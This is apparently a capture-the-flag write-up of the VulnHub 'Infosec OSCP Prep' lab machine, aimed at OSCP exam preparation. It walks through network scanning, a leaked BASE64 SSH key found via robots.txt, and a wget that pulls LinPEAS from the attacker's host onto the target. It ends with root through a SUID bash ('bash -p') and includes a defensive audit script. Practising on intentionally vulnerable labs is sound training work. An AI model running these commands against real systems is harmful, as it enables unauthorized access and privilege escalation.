InfoSecPrep : VulnHub Machines
Welcome to my writeup on hacking the Infosec OSCP prep machine from VulnHub. I’ll show you how I gained root access step by step.
KICKOFF
To download the Infosec OSCP Prep machine, click the link below:
https://www.vulnhub.com/entry/infosec-prep-oscp,508/
NOTE: This writeup shows the steps I used to successfully take control of the machine. It skips the many dead ends I encountered along the way. Feel free to try your own approach.
Let's Go and HACK :)
1 Independent Challenges
Target #1 – 192.168.100.116
1.1.1 Initial Access — Sensitive Information Disclosure
Vulnerability Explanation: I found a user named ‘oscp’ on a web page. Additionally, I discovered a robots.txt file that supposedly disallowed access to a file named secret.txt. However, this restriction was not enforced. The secret.txt file contained a BASE64-encoded SSH private key, which I decoded and used to log in as the oscp user.
Vulnerability Fix: Ensure that no robots.txt file or any sensitive files are accessible to clients.
Severity: High
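One way to check a web root for the disclosure described in 1.1.1, as an added example that is not part of the original writeup: it reads robots.txt from a local document root and flags any Disallow'd file that exists there and contains a PEM private key, either raw or BASE64 wrapped. The function names, the docroot layout and the sample key are constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

PEM_PRIVATE = re.compile(rb"-----BEGIN [A-Z0-9 ]*PRIVATE KEY-----")

def disallowed_paths(robots_txt: str) -> list[str]:
    """Return every non-empty Disallow path listed in robots.txt."""
    paths = []
    for line in robots_txt.splitlines():
        key, _, value = line.split("#", 1)[0].partition(":")  # drop comments
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths

def holds_private_key(data: bytes) -> bool:
    """True if data is a PEM private key, raw or wrapped in base64."""
    if PEM_PRIVATE.search(data):
        return True
    try:
        decoded = base64.b64decode(b"".join(data.split()), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return bool(PEM_PRIVATE.search(decoded))

def audit_docroot(docroot: Path) -> list[str]:
    """List Disallow'd files under docroot that exist and hold a key."""
    root = docroot.resolve()
    robots = root / "robots.txt"
    if not robots.is_file():
        return []
    findings = []
    for path in disallowed_paths(robots.read_text(errors="replace")):
        target = (root / path.lstrip("/")).resolve()
        # Skip wildcards, directories and anything outside the docroot.
        if target.is_file() and root in target.parents:
            if holds_private_key(target.read_bytes()):
                findings.append(path)
    return findings

def demo() -> list[str]:
    """Audit a constructed docroot that mirrors the finding above."""
    fake_pem = (b"-----BEGIN OPENSSH PRIVATE KEY-----\nCONSTRUCTED\n"
                b"-----END OPENSSH PRIVATE KEY-----\n")
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "robots.txt").write_text("User-agent: *\nDisallow: /secret.txt\n")
        (Path(tmp) / "secret.txt").write_bytes(base64.encodebytes(fake_pem))
        return audit_docroot(Path(tmp))
```

Calling `audit_docroot(Path("/var/www/html"))` (an assumed docroot path) returns the Disallow entries that need to be removed from the web root.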
1.1.2 Service Enumeration
Port Results
IP ADDRESS : 192.168.100.116
OPEN PORT: TCP 22,80
I ran Netdiscover to find the machine's IP address.
netdiscover -r 192.168.100.0/24
I ran an Nmap scan against the target and found a few ports.
nmap -p- -A -T4 -Pn -n -oN nmap.txt 192.168.100.116
I ran a Nikto scan for outdated vulnerabilities on HTTP port 80.
nikto -h http://192.168.100.116/
Nikto Finding
- Found robots.txt and wp-login-page
Home Page
Found the username ‘oscp’ on the home page.
In the footer of the page there is a login link, which redirected to the WP-LOGIN page from the Nikto finding.
WordPress Login Page.
The username ‘admin’ produced a different error.
Viewing the robots.txt from the Nikto finding.
robots.txt shows that the /secret.txt file is disallowed; however, access to it is not restricted.
To find out what this is, I used the CyberChef.io MAGIC Recipe (a type of automatic detection). It showed that the data was BASE64 encoded.
After decoding the BASE64, it turned out to be an SSH private key.
Saved that SSH private key in key format.
Logged in as the ‘oscp’ user with the SSH private key.
ssh -i private.key oscp@192.168.100.116
LocalValue
1.1.4 Privilege Escalation — SUID Misconfigured /bin/bash
The SUID configuration allows the `/bin/bash` program to be run as the root user, giving the user the privilege to execute this program. As a result, anything executed by this program will run with root privileges.
Using LinPEAS for Linux enumeration.
- Download LinPEAS from the GitHub Releases page
Link : https://github.com/peass-ng/PEASS-ng/releases/tag/20240804-31b931f7
- Upload LinPEAS using Python and download it using wget
python -m http.server 8080
wget http://KALIIPADDRESS:8080/linpeas.sh
Started LinPEAS.
LinPEAS found that there is a SUID-misconfigured /bin/bash with unnecessary privileges.
I found this GTFOBins entry for /bin/bash and how to exploit it.
bash -p
bash is the command to open a new Bash shell.
-p tells Bash to run in "privileged mode."
1.1.5 Post Exploitation
Proof Value.txt
Flag
d73b04b0e696b0945283defa3eee4538
That’s all from me. Happy Hacking ! :)
Thanks for reading my InfoSec OSCP prep writeup! I hope you found it helpful. Check out my GitHub for more writeups.